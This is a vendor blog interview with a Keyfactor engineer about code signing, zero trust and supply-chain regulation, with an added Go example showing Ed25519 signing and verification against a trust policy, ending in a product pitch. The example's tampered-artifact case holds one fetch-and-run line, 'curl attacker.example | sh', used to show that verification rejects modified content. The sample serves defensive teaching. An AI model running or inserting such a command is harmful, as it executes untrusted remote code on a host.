As we enter 2023, code signing will be more important than ever – and that’s saying a lot.
In today’s zero-trust environment, code signing is a critical control for protecting the integrity of software and infrastructure. Done right, it ensures that only authorized people and tools can produce a signature, and that signature lets users and devices verify two things before they run a piece of software: who published it, and that it has not been modified since it was signed. That is what allows them to decide which software to trust – and which not to trust.
Of course, like everything in the security world, introducing the right practices around code signing to achieve the desired end state is easier said than done. But getting it right will be an essential priority for 2023 to protect against breaches and supply chain attacks.
So what exactly does the current landscape around code signing look like and what can we expect to change in the year ahead? To answer these questions, we sat down with Eric Mizell, VP of Field Engineering at Keyfactor. Here’s what he had to say.
Keyfactor: In your opinion, what are some of the main reasons code signing has not yet been widely adopted?
Eric Mizell: I believe there are several reasons code signing hasn’t been widely adopted yet, and most of them have to do with varying levels of awareness. Those reasons, starting with the lowest awareness level, include:
- Teams don’t know how to sign code or where code signing fits into their organization.
- Code signing is on the to-do list but lower than other priorities.
- Code signing is happening, but is limited to a specific group and potentially unknown to the larger organization.
Finally, one of the biggest blockers to code signing, regardless of awareness levels, is limited standards and a lack of support and best practices for code signing.
Keyfactor: Despite lagging adoption, why is code signing becoming more important?
Eric: First and foremost, code signing plays a significant role in implementing zero-trust security strategies, which are quickly becoming the standard across organizations. Every company is a software company and the number of applications they build and deploy continues to grow. How can you trust what you build and deploy (zero-trust) if you are not signing?
On top of that, we’re also seeing an increase in insider threats. Specifically, with more and more engineers working from home, many are taking on more jobs and outsourcing code to untrusted individuals. This leads to more insider threats and will require organizations to introduce more checks and balances (one of which should be code signing) in response.
Keyfactor: As awareness around the importance of code signing increases, can we expect to see more standards introduced?
Eric: Absolutely, and GitHub has already started setting the standard. Recently, GitHub launched authentication requirements to verify the person checking in the code. In fact, companies can now enable a capability within GitHub that requires certificate authorization for developers to ensure that the code comes from the designated developer. This is the first step in the software supply chain to ensure code comes from a trusted developer.
Keyfactor: When do you think we’ll reach the tipping point where code signing becomes the norm?
Eric: Fortunately, very soon. Code signing will soon be required for banks, and that’s the first sign that the tipping point is coming, since historically, once high-risk security institutions (like banks) adopt a new security measure, other industries follow closely behind.
That said, we’re still at the beginning of this, as new regulations calling for secure software supply chains are just being introduced in the US. The current mandate applies to vendors who sell to the US government, but this will spread quickly and I expect to see a much different landscape at the end of the year.
Keyfactor: Are there any international standards we can look to as a model?
Eric: So far, the requirements in the US are very similar to those internationally, but many European Union companies are ahead of their US counterparts. As we learn more, we may find tighter regulations originating in the EU.
Keyfactor: What do you think is driving these new requirements for banks?
Eric: Quite simply, we can no longer live by the “trust and verify” approach. We now live in a zero-trust world, and that means we must ensure that all the software, scripts, and binaries we build and deploy are signed in a secure way.
Keyfactor: Does the fact that many banking services are now international complicate their ability to provide this level of security?
Eric: This extends much more broadly. I think every company has this issue since developers are no longer necessarily working in the same office on a secure network. When developers can be anywhere in the world, how do we verify their identity and confirm that they are actually the ones checking in code? Securing the software supply chain from code check-in to signing builds is the right path forward.
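The sign-then-verify model described in the interview, where the signature rather than the network a file arrived from decides whether a script or binary is trusted, can be shown concretely. The Go program below is an added example written for this page; it is not Keyfactor’s code or part of the Signum product. It uses only the standard library’s Ed25519 implementation, constructs its own sample deployment script, and assumes a made-up signer ID ("release-pipeline"), a hypothetical hostname (attacker.example) and an in-memory trust policy standing in for a real key-management system. It demonstrates the three outcomes a verifier must distinguish: a trusted signature, an artifact modified after signing, and an artifact signed by a key the organization never enrolled.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Artifact is a build output together with the detached signature a release
// pipeline attached to it. The struct is constructed for this example; real
// tooling (Authenticode, GPG, Sigstore) uses its own envelope formats.
type Artifact struct {
	Name      string // e.g. "deploy.sh" or "service-1.4.2.tar.gz"
	Content   []byte
	SignerID  string // which enrolled key claims to have signed it
	Signature []byte
}

// TrustPolicy is the verifier's allow-list: signer ID -> enrolled public key.
// Anything signed by a key that is not here is untrusted, however valid the math.
type TrustPolicy map[string]ed25519.PublicKey

var (
	ErrUnsigned      = errors.New("artifact carries no signature")
	ErrUnknownSigner = errors.New("signer is not in the trust policy")
	ErrBadSignature  = errors.New("signature does not match artifact")
)

// digest binds the artifact name and content into one value, so a valid
// signature cannot be moved from one file name onto another.
func digest(name string, content []byte) []byte {
	h := sha256.New()
	h.Write([]byte(name))
	h.Write([]byte{0}) // separator so name and content bytes cannot be confused
	h.Write(content)
	return h.Sum(nil)
}

// Sign is the build pipeline's step: the private key never leaves the signer.
func Sign(priv ed25519.PrivateKey, signerID, name string, content []byte) Artifact {
	return Artifact{
		Name:      name,
		Content:   append([]byte(nil), content...),
		SignerID:  signerID,
		Signature: ed25519.Sign(priv, digest(name, content)),
	}
}

// Verify is the deploying host's step: confirm the signer is enrolled, then
// check the signature over the bytes actually received, not the bytes claimed.
func Verify(policy TrustPolicy, a Artifact) error {
	if len(a.Signature) == 0 {
		return ErrUnsigned
	}
	pub, ok := policy[a.SignerID]
	if !ok {
		return ErrUnknownSigner
	}
	if !ed25519.Verify(pub, digest(a.Name, a.Content), a.Signature) {
		return ErrBadSignature
	}
	return nil
}

func main() {
	releasePub, releasePriv, _ := ed25519.GenerateKey(rand.Reader)
	_, roguePriv, _ := ed25519.GenerateKey(rand.Reader)
	policy := TrustPolicy{"release-pipeline": releasePub} // hypothetical signer ID

	script := []byte("#!/bin/sh\necho deploying\n") // constructed sample artifact
	good := Sign(releasePriv, "release-pipeline", "deploy.sh", script)
	fmt.Println("signed by pipeline:    ", Verify(policy, good))

	// Content altered after signing (attacker.example is a made-up host).
	tampered := good
	tampered.Content = []byte("#!/bin/sh\ncurl attacker.example | sh\n")
	fmt.Println("modified after signing:", Verify(policy, tampered))

	// Correctly signed, but by a key the organization never enrolled.
	rogue := Sign(roguePriv, "contractor-laptop", "deploy.sh", script)
	fmt.Println("unenrolled signer:     ", Verify(policy, rogue))
}
```

The point of the policy map is the one the interview makes: a mathematically valid signature is not enough, the key behind it has to be one the organization issued and still trusts, which is why revocation and key custody (HSM, signing service) matter as much as the signing step itself.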
Ready to get started with secure code signing in your org?
2023 will no doubt be the year that code signing becomes a top priority for organizations of all kinds. Stay ahead of the curve and start protecting your organization now with Keyfactor Signum, a secure signing-as-a-service platform that makes signing code, containers, software, and firmware effortless for application and operations teams and easy to manage for security teams.